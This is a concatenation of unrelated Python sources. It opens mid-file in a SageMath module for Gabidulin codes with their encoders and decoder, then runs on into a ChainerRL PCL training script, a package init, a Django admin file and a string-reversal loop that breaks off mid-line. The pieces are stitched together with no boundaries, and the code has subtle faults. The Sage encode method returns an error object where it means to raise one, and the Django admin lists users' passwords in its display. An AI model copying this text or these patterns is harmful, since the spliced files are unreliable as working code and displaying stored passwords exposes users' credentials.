extension, {}".format(self.extension_degree())) if evaluation_points is None: evaluation_points = [base_field.gen()**i for i in range(base_field.degree())][:length] else: if not len(evaluation_points) == length: raise ValueError("the number of evaluation points should be equal to the length of the code") for i in range(length): if not evaluation_points[i] in base_field: raise ValueError("evaluation point does not belong to the 'base field'") basis = self.matrix_form_of_vector(vector(evaluation_points)) if basis.rank() != length: raise ValueError("the evaluation points provided are not linearly independent") self._evaluation_points = evaluation_points self._dimension = dimension def _repr_(self): """ Return a string representation of ``self``. EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq); C [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) """ R = self.base_field() S = self.sub_field() if R and S in Fields(): return "[%s, %s, %s] linear Gabidulin code over GF(%s)/GF(%s)"%(self.length(), self.dimension(), self.minimum_distance(), R.cardinality(), S.cardinality()) else: return "[%s, %s, %s] linear Gabidulin code over %s/%s"%(self.length(), self.dimension(), self.minimum_distance(), R, S) def _latex_(self): """ Return a latex representation of ``self``. 
EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq); sage: latex(C) [2, 2, 1] \textnormal{ linear Gabidulin code over } \Bold{F}_{2^{4}}/\Bold{F}_{2^{2}} """ return "[%s, %s, %s] \\textnormal{ linear Gabidulin code over } %s/%s"\ % (self.length(), self.dimension() ,self.minimum_distance(), self.base_field()._latex_(), self.sub_field()._latex_()) def __eq__(self, other): """ Tests equality between Gabidulin Code objects. INPUT: - ``other`` -- another Gabidulin Code object OUTPUT: - ``True`` or ``False`` EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C1 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: C2 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: C1.__eq__(C2) True sage: Fqmm = GF(64) sage: C3 = codes.GabidulinCode(Fqmm, 2, 2, Fq) sage: C3.__eq__(C2) False """ return isinstance(other, GabidulinCode) \ and self.base_field() == other.base_field() \ and self.sub_field() == other.sub_field() \ and self.length() == other.length() \ and self.dimension() == other.dimension() \ and self.evaluation_points() == other.evaluation_points() def twisting_homomorphism(self): r""" Return the twisting homomorphism of ``self``. EXAMPLES:: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 5, 3, Fq) sage: C.twisting_homomorphism() Frobenius endomorphism z20 |--> z20^(5^4) on Finite Field in z20 of size 5^20 """ return self._twisting_homomorphism def minimum_distance(self): r""" Return the minimum distance of ``self``. Since Gabidulin Codes are Maximum-Distance-Separable (MDS), this returns ``self.length() - self.dimension() + 1``. EXAMPLES:: sage: Fqm = GF(5^20) sage: Fq = GF(5) sage: C = codes.GabidulinCode(Fqm, 20, 15, Fq) sage: C.minimum_distance() 6 """ return self.length() - self.dimension() + 1 def parity_evaluation_points(self): r""" Return the parity evalution points of ``self``. These form the first row of the parity check matrix of ``self``. EXAMPLES:: sage: C = codes.GabidulinCode(GF(2^10), 5, 2) sage: list(C.parity_check_matrix().row(0)) == C.parity_evaluation_points() #indirect_doctest True """ eval_pts = self.evaluation_points() n = self.length() k = self.dimension() sigma = self.twisting_homomorphism() coefficient_matrix = matrix(self.base_field(), n - 1, n, lambda i,j: (sigma**(-n + k + 1 + i))(eval_pts[j])) solution_space = coefficient_matrix.right_kernel() return list(solution_space.basis()[0]) def dual_code(self): r""" Return the dual code `C^{\perp}` of ``self``, the code `C`, .. MATH:: C^{\perp} = \{ v \in V\ |\ v\cdot c = 0,\ \forall c \in C \}. EXAMPLES:: sage: C = codes.GabidulinCode(GF(2^10), 5, 2) sage: C1 = C.dual_code(); C1 [5, 3, 3] linear Gabidulin code over GF(1024)/GF(2) sage: C == C1.dual_code() True """ return GabidulinCode(self.base_field(), self.length(), self.length() - self.dimension(), self.sub_field(), self.twisting_homomorphism(), self.parity_evaluation_points()) def parity_check_matrix(self): r""" Return the parity check matrix of ``self``. This is the generator matrix of the dual code of ``self``. EXAMPLES:: sage: C = codes.GabidulinCode(GF(2^3), 3, 2) sage: C.parity_check_matrix() [ 1 z3 z3^2 + z3] sage: C.parity_check_matrix() == C.dual_code().generator_matrix() True """ return self.dual_code().generator_matrix() def evaluation_points(self): """ Return the evaluation points of ``self``. 
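        These are the points `g_0, g_1, \ldots, g_{n-1}` fixed when the code was
        constructed; if none were supplied, they default to `1, g, g^2, \ldots, g^{n-1}`
        where `g` is the generator of the base field.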
EXAMPLES:: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: C.evaluation_points() [1, z20, z20^2, z20^3] """ return self._evaluation_points ####################### encoders ############################### class GabidulinVectorEvaluationEncoder(Encoder): def __init__(self, code): """ This method constructs the vector evaluation encoder for Gabidulin Codes. INPUT: - ``code`` -- the associated code of this encoder. EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E = codes.encoders.GabidulinVectorEvaluationEncoder(C) sage: E Vector evaluation style encoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) Alternatively, we can construct the encoder from ``C`` directly:: sage: E = C.encoder("VectorEvaluation") sage: E Vector evaluation style encoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) TESTS: If the code is not a Gabidulin code, an error is raised: sage: C = codes.HammingCode(GF(4), 2) sage: E = codes.encoders.GabidulinVectorEvaluationEncoder(C) Traceback (most recent call last): ... ValueError: code has to be a Gabidulin code """ if not isinstance(code, GabidulinCode): raise ValueError("code has to be a Gabidulin code") super(GabidulinVectorEvaluationEncoder, self).__init__(code) def _repr_(self): """ Return a string representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinVectorEvaluationEncoder(C); E Vector evaluation style encoder for [4, 4, 1] linear Gabidulin code over GF(95367431640625)/GF(625) """ return "Vector evaluation style encoder for %s" % self.code() def _latex_(self): """ Return a latex representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinVectorEvaluationEncoder(C) sage: latex(E) \textnormal{Vector evaluation style encoder for } [4, 4, 1] \textnormal{ linear Gabidulin code over } \Bold{F}_{5^{20}}/\Bold{F}_{5^{4}} """ return "\\textnormal{Vector evaluation style encoder for } %s" % self.code()._latex_() def __eq__(self, other): """ Tests equality between Gabidulin Generator Matrix Encoder objects. INPUT: - ``other`` -- another Gabidulin Generator Matrix Encoder OUTPUT: - ``True`` or ``False`` EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C1 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E1 = codes.encoders.GabidulinVectorEvaluationEncoder(C1) sage: C2 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E2 = codes.encoders.GabidulinVectorEvaluationEncoder(C2) sage: E1.__eq__(E2) True sage: Fqmm = GF(64) sage: C3 = codes.GabidulinCode(Fqmm, 2, 2, Fq) sage: E3 = codes.encoders.GabidulinVectorEvaluationEncoder(C3) sage: E3.__eq__(E2) False """ return isinstance(other, GabidulinVectorEvaluationEncoder) \ and self.code() == other.code() def generator_matrix(self): """ Return the generator matrix of ``self``. 
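        Row `i` of this matrix is obtained by applying the twisting homomorphism
        `i` times to every evaluation point, so the first row consists of the
        evaluation points themselves.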
EXAMPLES:: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 3, 3, Fq) sage: list(C.generator_matrix().row(1)) == [C.evaluation_points()[i]**(2**3) for i in range(3)] True """ from functools import reduce C = self.code() eval_pts = C.evaluation_points() sigma = C.twisting_homomorphism() create_matrix_elements = lambda A,k,f: reduce(lambda L,x: [x] + \ list(map(lambda l: list(map(f,l)), L)), [A]*k, []) return matrix(C.base_field(), C.dimension(), C.length(), create_matrix_elements(eval_pts, C.dimension(), sigma)) class GabidulinPolynomialEvaluationEncoder(Encoder): r""" Encoder for Gabidulin codes which uses evaluation of skew polynomials to obtain codewords. Let `C` be a Gabidulin code of length `n` and dimension `k` over some finite field `F = GF(q^m)`. We denote by `\alpha_i` its evaluations points, where `1 \leq i \leq n`. Let `p`, a skew polynomial of degree at most `k-1` in `F[x]`, be the message. The encoding of `m` will be the following codeword: .. MATH:: (p(\alpha_1), \dots, p(\alpha_n)). TESTS:: This module uses the following experimental feature: This test block is here only to trigger the experimental warning so it does not interferes with doctests:: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^2 + z9 + 1)*x + z9^7 + z9^5 + z9^4 + z9^2 sage: vector(p.multi_point_evaluation(C.evaluation_points())) doctest:...: FutureWarning: This class/method/function is marked as experimental. It, its functionality or its interface might change without a formal deprecation. See http://trac.sagemath.org/13215 for details. (z9^7 + z9^6 + z9^5 + z9^4 + z9 + 1, z9^6 + z9^5 + z9^3 + z9) EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: E Polynomial evaluation style encoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) Alternatively, we can construct the encoder from ``C`` directly:: sage: E = C.encoder("PolynomialEvaluation") sage: E Polynomial evaluation style encoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) """ def __init__(self, code): r""" INPUT: - ``code`` -- the associated code of this encoder TESTS: If the code is not a Gabidulin code, an error is raised: sage: C = codes.HammingCode(GF(4), 2) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) Traceback (most recent call last): ... ValueError: code has to be a Gabidulin code """ if not isinstance(code, GabidulinCode): raise ValueError("code has to be a Gabidulin code") super(GabidulinPolynomialEvaluationEncoder, self).__init__(code) def _repr_(self): """ Return a string representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C); E Polynomial evaluation style encoder for [4, 4, 1] linear Gabidulin code over GF(95367431640625)/GF(625) """ return "Polynomial evaluation style encoder for %s" % self.code() def _latex_(self): """ Return a latex representation of ``self``. 
EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: latex(E) \textnormal{Polynomial evaluation style encoder for } [4, 4, 1] \textnormal{ linear Gabidulin code over } \Bold{F}_{5^{20}}/\Bold{F}_{5^{4}} """ return "\\textnormal{Polynomial evaluation style encoder for } %s" % self.code()._latex_() def __eq__(self, other): """ Test equality between Gabidulin Polynomial Evaluation Encoder objects. INPUT: - ``other`` -- another Gabidulin Polynomial Evaluation Encoder OUTPUT: - ``True`` or ``False`` EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C1 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E1 = codes.encoders.GabidulinPolynomialEvaluationEncoder(C1) sage: C2 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E2 = codes.encoders.GabidulinPolynomialEvaluationEncoder(C2) sage: E1.__eq__(E2) True sage: Fqmm = GF(64) sage: C3 = codes.GabidulinCode(Fqmm, 2, 2, Fq) sage: E3 = codes.encoders.GabidulinPolynomialEvaluationEncoder(C3) sage: E3.__eq__(E2) False """ return isinstance(other, GabidulinPolynomialEvaluationEncoder) \ and self.code() == other.code() def message_space(self): r""" Return the message space of the associated code of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: E.message_space() Ore Polynomial Ring in x over Finite Field in z20 of size 5^20 twisted by z20 |--> z20^(5^4) """ C = self.code() return C.base_field()['x', C.twisting_homomorphism()] def encode(self, p, form="vector"): """ Transform the polynomial ``p`` into a codeword of :meth:`code`. The output codeword can be represented as a vector or a matrix, depending on the ``form`` input. INPUT: - ``p`` -- a skew polynomial from the message space of ``self`` of degree less than ``self.code().dimension()`` - ``form`` -- type parameter taking strings "vector" or "matrix" as values and converting the output codeword into the respective form (default: "vector") OUTPUT: - a codeword corresponding to `p` in vector or matrix form EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^2 + z9 + 1)*x + z9^7 + z9^5 + z9^4 + z9^2 sage: codeword_vector = E.encode(p, "vector"); codeword_vector (z9^7 + z9^6 + z9^5 + z9^4 + z9 + 1, z9^6 + z9^5 + z9^3 + z9) sage: codeword_matrix = E.encode(p, "matrix"); codeword_matrix [ z3 z3^2 + z3] [ z3 1] [ z3^2 z3^2 + z3 + 1] TESTS: If the skew polynomial, `p`, has degree greater than or equal to the dimension of the code, an error is raised:: sage: t = z9^4*x^2 + z9 sage: codeword_vector = E.encode(t, "vector"); codeword_vector Traceback (most recent call last): ... ValueError: the skew polynomial to encode must have degree at most 1 The skew polynomial, `p`, must belong to the message space of the code. Otherwise, an error is raised:: sage: Fqmm = GF(2^12) sage: S. = Fqmm['x', Fqmm.frobenius_endomorphism(n=3)] sage: q = S.random_element(degree=2) sage: codeword_vector = E.encode(q, "vector"); codeword_vector Traceback (most recent call last): ... 
ValueError: the message to encode must be in Ore Polynomial Ring in x over Finite Field in z9 of size 2^9 twisted by z9 |--> z9^(2^3) """ C = self.code() M = self.message_space() if p not in M: raise ValueError("the message to encode must be in %s" % M) if p.degree() >= C.dimension(): raise ValueError("the skew polynomial to encode must have degree at most %s" % (C.dimension() - 1)) eval_pts = C.evaluation_points() codeword = p.multi_point_evaluation(eval_pts) if form == "vector": return vector(codeword) elif form == "matrix": return C.matrix_form_of_vector(vector(codeword)) else: return ValueError("the argument 'form' takes only either 'vector' or 'matrix' as valid input") def unencode_nocheck(self, c): """ Return the message corresponding to the codeword ``c``. Use this method with caution: it does not check if ``c`` belongs to the code, and if this is not the case, the output is unspecified. INPUT: - ``c`` -- a codeword of :meth:`code` OUTPUT: - a skew polynomial of degree less than ``self.code().dimension()`` EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^4)*x + z9^2 + z9 sage: codeword_vector = E.encode(p, "vector") sage: E.unencode_nocheck(codeword_vector) (z9^6 + z9^4)*x + z9^2 + z9 """ C = self.code() eval_pts = C.evaluation_points() values = [c[i] for i in range(len(c))] points = [(eval_pts[i], values[i]) for i in range(len(eval_pts))] p = self.message_space().lagrange_polynomial(points) return p ####################### decoders ############################### class GabidulinGaoDecoder(Decoder): def __init__(self, code): r""" Gao style decoder for Gabidulin Codes. INPUT: - ``code`` -- the associated code of this decoder EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: D Gao decoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) Alternatively, we can construct the encoder from ``C`` directly:: sage: D = C.decoder("Gao") sage: D Gao decoder for [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) TESTS: If the code is not a Gabidulin code, an error is raised: sage: C = codes.HammingCode(GF(4), 2) sage: D = codes.decoders.GabidulinGaoDecoder(C) Traceback (most recent call last): ... ValueError: code has to be a Gabidulin code """ if not isinstance(code, GabidulinCode): raise ValueError("code has to be a Gabidulin code") super(GabidulinGaoDecoder, self).__init__(code, code.ambient_space(), "PolynomialEvaluation") def _repr_(self): """ Return a string representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C); D Gao decoder for [4, 4, 1] linear Gabidulin code over GF(95367431640625)/GF(625) """ return "Gao decoder for %s" % self.code() def _latex_(self): """ Return a latex representation of ``self``. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5^4) sage: C = codes.GabidulinCode(Fqm, 4, 4, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: latex(D) \textnormal{Gao decoder for } [4, 4, 1] \textnormal{ linear Gabidulin code over } \Bold{F}_{5^{20}}/\Bold{F}_{5^{4}} """ return "\\textnormal{Gao decoder for } %s" % self.code()._latex_() def __eq__(self, other): """ Tests equality between Gabidulin Gao Decoder objects. 
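        Two Gao decoders are considered equal exactly when their associated codes
        are equal.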
INPUT: - ``other`` -- another Gabidulin Gao Decoder OUTPUT: - ``True`` or ``False`` EXAMPLES:: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C1 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D1 = codes.decoders.GabidulinGaoDecoder(C1) sage: C2 = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D2 = codes.decoders.GabidulinGaoDecoder(C2) sage: D1.__eq__(D2) True sage: Fqmm = GF(64) sage: C3 = codes.GabidulinCode(Fqmm, 2, 2, Fq) sage: D3 = codes.decoders.GabidulinGaoDecoder(C3) sage: D3.__eq__(D2) False """ return isinstance(other, GabidulinGaoDecoder) \ and self.code() == other.code() def _partial_xgcd(self, a, b, d_stop): """ Compute the partial gcd of `a` and `b` using the right linearized extended Euclidean algorithm up to the `d_stop` iterations. This is a private method for internal use only. INPUT: - ``a`` -- a skew polynomial - ``b`` -- another skew polynomial - ``d_stop`` -- the number of iterations for which the algorithm is to be run OUTPUT: - ``r_c`` -- right linearized remainder of `a` and `b` - ``u_c`` -- right linearized quotient of `a` and `b` EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^4)*x + z9^2 + z9 sage: codeword_vector = E.encode(p, "vector") sage: r = D.decode_to_message(codeword_vector) #indirect_doctest sage: r (z9^6 + z9^4)*x + z9^2 + z9 """ S = self.message_space() if (a not in S) or (b not in S): raise ValueError("both the input polynomials must belong to %s" % S) if a.degree() < b.degree(): raise ValueError("degree of first polynomial must be greater than or equal to degree of second polynomial") r_p = a r_c = b u_p = S.zero() u_c = S.one() v_p = u_c v_c = u_p while r_c.degree() >= d_stop: (q, r_c), r_p = r_p.right_quo_rem(r_c), r_c u_c, u_p = u_p - q*u_c, u_c v_c, v_p = v_p - q*v_c, v_c return r_c, u_c def _decode_to_code_and_message(self, r): """ Return the decoded codeword and message (skew polynomial) corresponding to the received codeword `r`. This is a private method for internal use only. INPUT: - ``r`` -- received codeword OUTPUT: - the decoded codeword and decoded message corresponding to the received codeword `r` EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. 
= Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^4)*x + z9^2 + z9 sage: codeword_vector = E.encode(p, "vector") sage: r = D.decode_to_message(codeword_vector) #indirect doctest sage: r (z9^6 + z9^4)*x + z9^2 + z9 """ C = self.code() length = len(r) eval_pts = C.evaluation_points() S = self.message_space() if length == C.dimension() or r in C: return r, self.connected_encoder().unencode_nocheck(r) points = [(eval_pts[i], r[i]) for i in range(len(eval_pts))] #R = S.lagrange_polynomial(eval_pts, list(r)) R = S.lagrange_polynomial(points) r_out, u_out = self._partial_xgcd(S.minimal_vanishing_polynomial(eval_pts), R, (C.length() + C.dimension()) // 2) quo, rem = r_out.left_quo_rem(u_out) if not rem.is_zero(): raise DecodingError("Decoding failed because the number of errors exceeded the decoding radius") if quo not in S: raise DecodingError("Decoding failed because the number of errors exceeded the decoding radius") c = self.connected_encoder().encode(quo) if C.rank_weight_of_vector(c-r) > self.decoding_radius(): raise DecodingError("Decoding failed because the number of errors exceeded the decoding radius") return c, quo def decode_to_code(self, r): """ Return the decoded codeword corresponding to the received word `r`. INPUT: - ``r`` -- received codeword OUTPUT: - the decoded codeword corresponding to the received codeword EXAMPLES: sage: Fqm = GF(3^20) sage: Fq = GF(3) sage: C = codes.GabidulinCode(Fqm, 5, 3, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z20 = Fqm.gen() sage: p = x sage: codeword_vector = E.encode(p, "vector") sage: codeword_vector (1, z20^3, z20^6, z20^9, z20^12) sage: l = list(codeword_vector) sage: l[0] = l[1] #make an error sage: D.decode_to_code(vector(l)) (1, z20^3, z20^6, z20^9, z20^12) """ return self._decode_to_code_and_message(r)[0] def decode_to_message(self, r): """ Return the skew polynomial (message) corresponding to the received word `r`. INPUT: - ``r`` -- received codeword OUTPUT: - the message corresponding to the received codeword EXAMPLES: sage: Fqm = GF(2^9) sage: Fq = GF(2^3) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: E = codes.encoders.GabidulinPolynomialEvaluationEncoder(C) sage: S. = Fqm['x', C.twisting_homomorphism()] sage: z9 = Fqm.gen() sage: p = (z9^6 + z9^4)*x + z9^2 + z9 sage: codeword_vector = E.encode(p, "vector") sage: r = D.decode_to_message(codeword_vector) sage: r (z9^6 + z9^4)*x + z9^2 + z9 """ return self._decode_to_code_and_message(r)[1] def decoding_radius(self): """ Return the decoding radius of the Gabidulin Gao Decoder. EXAMPLES: sage: Fqm = GF(5^20) sage: Fq = GF(5) sage: C = codes.GabidulinCode(Fqm, 20, 4, Fq) sage: D = codes.decoders.GabidulinGaoDecoder(C) sage: D.decoding_radius() 8 """ return (self.code().minimum_distance() - 1) // 2 ############################## registration #################################### GabidulinCode._registered_encoders["PolynomialEvaluation"] = GabidulinPolynomialEvaluationEncoder GabidulinCode._registered_encoders["VectorEvaluation"] = GabidulinVectorEvaluationEncoder GabidulinCode._registered_decoders["Gao"] = GabidulinGaoDecoder """An example of training PCL against OpenAI Gym Envs. This script is an example of training a PCL agent against OpenAI Gym envs. Both discrete and continuous action spaces are supported. 
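The network architecture is chosen from the environment's action space: a
Gaussian policy is used for continuous (Box) action spaces and a softmax
policy for discrete ones.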
To solve CartPole-v0, run: python train_pcl_gym.py To solve InvertedPendulum-v1, run: python train_pcl_gym.py --env InvertedPendulum-v1 """ from __future__ import division from __future__ import print_function from __future__ import unicode_literals from __future__ import absolute_import from builtins import * # NOQA from future import standard_library standard_library.install_aliases() import argparse import chainer import gym gym.undo_logger_setup() import gym.wrappers import numpy as np import chainerrl from chainerrl import experiments from chainerrl import misc from chainerrl.optimizers import rmsprop_async def exp_return_of_episode(episode): return np.exp(sum(x['reward'] for x in episode)) def main(): import logging parser = argparse.ArgumentParser() parser.add_argument('--processes', type=int, default=8) parser.add_argument('--gpu', type=int, default=0) parser.add_argument('--env', type=str, default='CartPole-v0') parser.add_argument('--seed', type=int, default=None) parser.add_argument('--outdir', type=str, default=None) parser.add_argument('--batchsize', type=int, default=10) parser.add_argument('--rollout-len', type=int, default=10) parser.add_argument('--n-hidden-channels', type=int, default=100) parser.add_argument('--n-hidden-layers', type=int, default=2) parser.add_argument('--n-times-replay', type=int, default=1) parser.add_argument('--replay-start-size', type=int, default=10000) parser.add_argument('--t-max', type=int, default=None) parser.add_argument('--tau', type=float, default=1e-2) parser.add_argument('--profile', action='store_true') parser.add_argument('--steps', type=int, default=8 * 10 ** 7) parser.add_argument('--eval-interval', type=int, default=10 ** 5) parser.add_argument('--eval-n-runs', type=int, default=10) parser.add_argument('--reward-scale-factor', type=float, default=1e-2) parser.add_argument('--render', action='store_true', default=False) parser.add_argument('--lr', type=float, default=7e-4) parser.add_argument('--demo', action='store_true', default=False) parser.add_argument('--load', type=str, default='') parser.add_argument('--logger-level', type=int, default=logging.DEBUG) parser.add_argument('--monitor', action='store_true') parser.add_argument('--train-async', action='store_true', default=False) parser.add_argument('--prioritized-replay', action='store_true', default=False) parser.add_argument('--disable-online-update', action='store_true', default=False) parser.add_argument('--backprop-future-values', action='store_true', default=True) parser.add_argument('--no-backprop-future-values', action='store_false', dest='backprop_future_values') args = parser.parse_args() logging.basicConfig(level=args.logger_level) if args.seed is not None: misc.set_random_seed(args.seed) args.outdir = experiments.prepare_output_dir(args, args.outdir) def make_env(process_idx, test): env = gym.make(args.env) if args.monitor and process_idx == 0: env = gym.wrappers.Monitor(env, args.outdir) # Scale rewards observed by agents if not test: misc.env_modifiers.make_reward_filtered( env, lambda x: x * args.reward_scale_factor) if args.render and process_idx == 0 and not test: misc.env_modifiers.make_rendered(env) return env sample_env = gym.make(args.env) timestep_limit = sample_env.spec.tags.get( 'wrapper_config.TimeLimit.max_episode_steps') obs_space = sample_env.observation_space action_space = sample_env.action_space # Switch policy types accordingly to action space types if isinstance(action_space, gym.spaces.Box): model = chainerrl.agents.pcl.PCLSeparateModel( 
pi=chainerrl.policies.FCGaussianPolicy( obs_space.low.size, action_space.low.size, n_hidden_channels=args.n_hidden_channels, n_hidden_layers=args.n_hidden_layers, bound_mean=True, min_action=action_space.low, max_action=action_space.high, var_wscale=1e-3, var_bias=1, var_type='diagonal', ), v=chainerrl.v_functions.FCVFunction( obs_space.low.size, n_hidden_channels=args.n_hidden_channels, n_hidden_layers=args.n_hidden_layers, ) ) else: model = chainerrl.agents.pcl.PCLSeparateModel( pi=chainerrl.policies.FCSoftmaxPolicy( obs_space.low.size, action_space.n, n_hidden_channels=args.n_hidden_channels, n_hidden_layers=args.n_hidden_layers ), v=chainerrl.v_functions.FCVFunction( obs_space.low.size, n_hidden_channels=args.n_hidden_channels, n_hidden_layers=args.n_hidden_layers, ), ) if not args.train_async and args.gpu >= 0: chainer.cuda.get_device(args.gpu).use() model.to_gpu(args.gpu) if args.train_async: opt = rmsprop_async.RMSpropAsync(lr=args.lr, alpha=0.99) else: opt = chainer.optimizers.Adam(alpha=args.lr) opt.setup(model) if args.prioritized_replay: replay_buffer = \ chainerrl.replay_buffer.PrioritizedEpisodicReplayBuffer( capacity=5 * 10 ** 3, uniform_ratio=0.1, default_priority_func=exp_return_of_episode, wait_priority_after_sampling=False, return_sample_weights=False) else: replay_buffer = chainerrl.replay_buffer.EpisodicReplayBuffer( capacity=5 * 10 ** 3) agent = chainerrl.agents.PCL( model, opt, replay_buffer=replay_buffer, t_max=args.t_max, gamma=0.99, tau=args.tau, phi=lambda x: x.astype(np.float32, copy=False), rollout_len=args.rollout_len, n_times_replay=args.n_times_replay, replay_start_size=args.replay_start_size, batchsize=args.batchsize, train_async=args.train_async, disable_online_update=args.disable_online_update, backprop_future_values=args.backprop_future_values, ) if args.load: agent.load(args.load) if args.demo: env = make_env(0, True) eval_stats = experiments.eval_performance( env=env, agent=agent, n_runs=args.eval_n_runs, max_episode_len=timestep_limit) print('n_runs: {} mean: {} median: {} stdev {}'.format( args.eval_n_runs, eval_stats['mean'], eval_stats['median'], eval_stats['stdev'])) else: if args.train_async: experiments.train_agent_async( agent=agent, outdir=args.outdir, processes=args.processes, make_env=make_env, profile=args.profile, steps=args.steps, eval_n_runs=args.eval_n_runs, eval_interval=args.eval_interval, max_episode_len=timestep_limit) else: experiments.train_agent_with_evaluation( agent=agent, env=make_env(0, test=False), eval_env=make_env(0, test=True), outdir=args.outdir, steps=args.steps, eval_n_runs=args.eval_n_runs, eval_interval=args.eval_interval, max_episode_len=timestep_limit) if __name__ == '__main__': main() from .convolutions import * from .pooling import * __version__ = '0.1' 0 from django.contrib import admin from gestionpedidos.models import usuarios, houses # Register your models here. class usuarios_admin(admin.ModelAdmin): list_display = ("name", "email", "password", "city", "country") search_fields = ("name", "email", "city", "country") list_filter = ("country",) class houses_admin(admin.ModelAdmin): list_display = ("city", "description", "price", "image") admin.site.register(usuarios, usuarios_admin) admin.site.register(houses, houses_admin) flag = "y" while flag.lower() == "y": string = input("Enter string to be reversed: ") print(f"The given string after reversing:\n{string[::-1]}\n") flag = input("Reverse more strings? 
